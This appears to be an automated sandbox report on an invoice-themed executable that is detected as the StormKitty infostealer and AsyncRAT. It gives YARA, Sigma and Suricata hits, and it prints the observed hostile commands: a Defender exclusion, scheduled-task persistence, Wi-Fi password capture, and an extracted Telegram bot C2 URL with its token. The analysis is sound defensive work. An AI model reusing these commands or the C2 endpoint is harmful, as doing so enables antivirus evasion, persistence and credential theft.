7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x51abb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x51b2d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x51bb7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x51c49:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x51cb3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x51d25:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x51dbb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x51e4b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x3dbac:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x472ea:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x471ea:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x5276b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.?)" 0x5299d:$s6: "encrypted_key":"(.?)"
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x81fa3:$sk01: LimerBoy/StormKitty 0x987ee:$sk01: LimerBoy/StormKitty 0xad9c3:$sk01: LimerBoy/StormKitty 0xc420e:$sk01: LimerBoy/StormKitty 0x8d899:$str01: set_sUsername 0xb92b9:$str01: set_sUsername 0x8da1f:$str02: set_sIsSecure 0xb943f:$str02: set_sIsSecure 0x8dafd:$str03: set_sExpMonth 0xb951d:$str03: set_sExpMonth 0x8bf4c:$str04: WritePasswords 0xb796c:$str04: WritePasswords 0x8c9eb:$str05: WriteCookies 0xb840b:$str05: WriteCookies 0x8dcad:$str06: sChromiumPswPaths 0xb96cd:$str06: sChromiumPswPaths 0x8dcbf:$str07: sGeckoBrowserPaths 0xb96df:$str07: sGeckoBrowserPaths 0x94ac1:$str08: Username: {1} 0x95c69:$str08: Username: {1} 0xc04e1:$str08: Username: {1}
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x8f4e9:$str01: get_ActivatePong 0xbaf09:$str01: get_ActivatePong 0x8f40e:$str02: get_SslClient 0xbae2e:$str02: get_SslClient 0x8f3f2:$str03: get_TcpClient 0xbae12:$str03: get_TcpClient 0x8f4b0:$str04: get_SendSync 0xbaed0:$str04: get_SendSync 0x8f490:$str05: get_IsConnected 0xbaeb0:$str05: get_IsConnected 0x8df51:$str06: set_UseShellExecute 0xb9971:$str06: set_UseShellExecute 0x99298:$str07: Pastebin 0xc4cb8:$str07: Pastebin 0x9328b:$str08: Select * from AntivirusProduct 0xbecab:$str08: Select * from AntivirusProduct 0x99172:$str10: timeout 3 > NUL 0xc4b92:$str10: timeout 3 > NUL 0x99070:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0xc4a90:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x99100:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x99102:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xc4b22:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x95683:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0xc10a3:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x9775f:$s1: \VPN\NordVPN 0xc317f:$s1: \VPN\NordVPN 0x97745:$s2: \VPN\OpenVPN 0xc3165:$s2: \VPN\OpenVPN 0x97727:$s3: \VPN\ProtonVPN 0xc3147:$s3: \VPN\ProtonVPN
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x95ebb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xc18db:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x95f2d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xc194d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x95fb7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xc19d7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x96049:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xc1a69:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x960b3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xc1ad3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x96125:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xc1b45:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x961bb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xc1bdb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x9624b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0xc1c6b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x81fac:$x3: StormKitty 0xad9cc:$x3: StormKitty 0x8b6ea:$s1: GetBSSID 0xb710a:$s1: GetBSSID 0x8b5ea:$s2: GetAntivirus 0xb700a:$s2: GetAntivirus 0x96b6b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0xc258b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x96d9d:$s6: "encrypted_key":"(.?)" 0xc27bd:$s6: "encrypted_key":"(.?)"
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0xf1fc3:$sk01: LimerBoy/StormKitty 0x10880e:$sk01: LimerBoy/StormKitty 0x11d9e3:$sk01: LimerBoy/StormKitty 0x13422e:$sk01: LimerBoy/StormKitty 0xfd8b9:$str01: set_sUsername 0x1292d9:$str01: set_sUsername 0xfda3f:$str02: set_sIsSecure 0x12945f:$str02: set_sIsSecure 0xfdb1d:$str03: set_sExpMonth 0x12953d:$str03: set_sExpMonth 0xfbf6c:$str04: WritePasswords 0x12798c:$str04: WritePasswords 0xfca0b:$str05: WriteCookies 0x12842b:$str05: WriteCookies 0xfdccd:$str06: sChromiumPswPaths 0x1296ed:$str06: sChromiumPswPaths 0xfdcdf:$str07: sGeckoBrowserPaths 0x1296ff:$str07: sGeckoBrowserPaths 0x104ae1:$str08: Username: {1} 0x105c89:$str08: Username: {1} 0x130501:$str08: Username: {1}
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0xff509:$str01: get_ActivatePong 0x12af29:$str01: get_ActivatePong 0xff42e:$str02: get_SslClient 0x12ae4e:$str02: get_SslClient 0xff412:$str03: get_TcpClient 0x12ae32:$str03: get_TcpClient 0xff4d0:$str04: get_SendSync 0x12aef0:$str04: get_SendSync 0xff4b0:$str05: get_IsConnected 0x12aed0:$str05: get_IsConnected 0xfdf71:$str06: set_UseShellExecute 0x129991:$str06: set_UseShellExecute 0x1092b8:$str07: Pastebin 0x134cd8:$str07: Pastebin 0x1032ab:$str08: Select * from AntivirusProduct 0x12eccb:$str08: Select * from AntivirusProduct 0x109192:$str10: timeout 3 > NUL 0x134bb2:$str10: timeout 3 > NUL 0x109090:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x134ab0:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x109120:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x109122:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x134b42:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x1056a3:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x1310c3:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x10777f:$s1: \VPN\NordVPN 0x13319f:$s1: \VPN\NordVPN 0x107765:$s2: \VPN\OpenVPN 0x133185:$s2: \VPN\OpenVPN 0x107747:$s3: \VPN\ProtonVPN 0x133167:$s3: \VPN\ProtonVPN
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x105edb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1318fb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x105f4d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x13196d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x105fd7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1319f7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x106069:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x131a89:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1060d3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x131af3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x106145:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x131b65:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1061db:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x131bfb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x10626b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x131c8b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0xf1fcc:$x3: StormKitty 0x11d9ec:$x3: StormKitty 0xfb70a:$s1: GetBSSID 0x12712a:$s1: GetBSSID 0xfb60a:$s2: GetAntivirus 0x12702a:$s2: GetAntivirus 0x106b8b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x1325ab:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x106dbd:$s6: "encrypted_key":"(.?)" 0x1327dd:$s6: "encrypted_key":"(.?)"
Click to see the 120 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe", ParentImage: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe, ParentProcessId: 3848, ParentProcessName: Invoice-BL. Payment TT $ 28,945.99.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe", ProcessId: 3716, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp73B2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp73B2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe, ParentImage: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe, ParentProcessId: 7308, ParentProcessName: SFHAWxtoIpgL.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp73B2.tmp", ProcessId: 7564, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe", ParentImage: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe, ParentProcessId: 3848, ParentProcessName: Invoice-BL. Payment TT $ 28,945.99.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp", ProcessId: 6908, ProcessName: schtasks.exe

Sigma detected: Suspicious desktop.ini Action

Source: File created

Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe, ProcessId: 7276, TargetFilename: C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe", ParentImage: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe, ParentProcessId: 3848, ParentProcessName: Invoice-BL. Payment TT $ 28,945.99.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe", ProcessId: 3716, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe", ParentImage: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe, ParentProcessId: 3848, ParentProcessName: Invoice-BL. Payment TT $ 28,945.99.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp", ProcessId: 6908, ProcessName: schtasks.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe", ParentImage: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe, ParentProcessId: 7276, ParentProcessName: Invoice-BL. Payment TT $ 28,945.99.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7748, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE StormKitty Data Exfil via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T14:29:17.597583+0100	2031009	1	Malware Command and Control Activity Detected	192.168.2.4	49743	149.154.167.220	443	TCP
2024-12-31T14:29:26.617368+0100	2031009	1	Malware Command and Control Activity Detected	192.168.2.4	49748	149.154.167.220	443	TCP

ET MALWARE WorldWind Stealer Checkin via Telegram (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T14:29:17.597583+0100	2044766	1	A Network Trojan was detected	192.168.2.4	49743	149.154.167.220	443	TCP
2024-12-31T14:29:26.617368+0100	2044766	1	A Network Trojan was detected	192.168.2.4	49748	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T14:29:18.653042+0100	2803305	3	Unknown Traffic	192.168.2.4	49744	149.154.167.220	443	TCP
2024-12-31T14:29:27.656433+0100	2803305	3	Unknown Traffic	192.168.2.4	49750	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T14:29:17.597583+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49743	149.154.167.220	443	TCP
2024-12-31T14:29:18.653042+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49744	149.154.167.220	443	TCP
2024-12-31T14:29:26.617368+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49748	149.154.167.220	443	TCP
2024-12-31T14:29:27.656433+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49750	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808"}
Source: SFHAWxtoIpgL.exe.7620.11.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe

ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: Invoice-BL. Payment TT $ 28,945.99.exe	ReversingLabs: Detection: 73%
Source: Invoice-BL. Payment TT $ 28,945.99.exe	Virustotal: Detection: 69%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Invoice-BL. Payment TT $ 28,945.99.exe

Joe Sandbox ML: detected

Source: Invoice-BL. Payment TT $ 28,945.99.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2

Source: Invoice-BL. Payment TT $ 28,945.99.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.6.dr, Temp.txt.11.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.6.dr, Temp.txt.11.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.6.dr, Temp.txt.11.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.6.dr, Temp.txt.11.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49744 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49748 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.4:49748 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.4:49748 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49750 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE
